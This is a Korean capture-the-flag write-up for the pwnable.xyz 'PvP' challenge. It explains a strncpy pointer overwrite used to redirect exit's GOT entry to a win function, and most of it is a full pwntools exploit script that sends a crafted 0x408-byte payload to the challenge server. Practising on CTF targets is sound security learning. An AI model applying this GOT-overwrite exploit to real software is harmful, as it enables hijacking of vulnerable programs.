
pwnable.xyz / PvP

lok2h4rd 2022. 5. 21. 20:19

너무 멍청했다 말하기도 쪽팔린다
strncpy가 널 바이트가 나올 때까지 복사된다고 생각했다


strncpy로 포인터를 덮을 수 있고 exit got함수를 win함수로 덮어서 시그널 터질 때 플래그가 출력되도록 했다

from pwn import * 
#context.log_level = "debug"

exit_got = 0x6020a0  # GOT slot of exit() (see writeup). A fixed address like this only works on a non-PIE binary with a writable GOT (no full RELRO) — TODO confirm against the challenge binary


def save():
    """Select menu option 4 and answer the "message? " prompt with 3.

    The function name suggests option 4 is the "save" action; the code only
    shows the two prompt/answer pairs. Operates on the module-level tube ``p``
    and returns nothing.
    """
    for prompt, answer in ((b"> ", b"4"), (b"message? ", b"3")):
        p.recvuntil(prompt)
        p.sendline(answer)

def append(arr, func_type):
    """Send one NUL-terminated chunk of ``arr`` through menu option ``func_type``.

    Selects the option, reads the count the service prints after "me ", and
    sends that many bytes minus one; the final byte sent is always a NUL.

    Args:
        arr: bytes still to be delivered.
        func_type: menu option number, sent as text.

    Returns:
        Number of bytes of ``arr`` consumed, or 0 when nothing (or only a
        NUL terminator) was sent.
    """
    p.recvuntil(b"> ")
    # NOTE: a str is passed here; pwntools converts it to bytes (recent versions warn).
    p.sendline(str(func_type))

    p.recvuntil(b"me ")
    want = int(p.recvuntil(b" "))

    if want == 0:
        return 0
    if want > len(arr):
        # NOTE(review): the author shrinks the count by len(arr) rather than
        # clamping to it — intent not obvious from the code; kept as written.
        want -= len(arr)
    elif want == 1:
        p.send(b"\x00")
        return 0

    chunk = arr[:want - 1] + b"\x00"
    p.send(chunk)
    return want - 1


# Payload layout: a 3-byte prefix (presumably the low bytes of the win-function
# address the writeup refers to — verify against the binary), filler up to
# 0x400 bytes, then the address of exit's GOT slot. Total length: 0x408 bytes.
payload = b"".join([
    b"\x2d\x0b\x40",
    b"A" * (0x400 - 3),
    p64(exit_got),
])

num = 0
total_len = 0

# Reconnect until the first append (option 2) reports a usable length: a first
# count below 0x100 is treated as a bad connection and the tube is discarded.
while True:
    p = remote("svc.pwnable.xyz", 30022)
    #p = process("./pvp")
    num = append(payload, 2)
    print(f"long num: {hex(num)}")
    if num >= 0x100:
        break
    p.close()

# Deliver the remainder through option 1 until the whole 0x408-byte payload
# built above has been consumed. The body runs at least once, as in the
# original do-while shape.
total_len = num
payload = payload[num:]
while True:
    num = append(payload, 1)
    payload = payload[num:]
    total_len += num
    print(total_len)
    if total_len >= 0x408:
        break

save()  # select option 4 / answer 3 on the tube the loop above left open
p.interactive()  # hand the connection over; per the writeup the flag is printed when the signal handler fires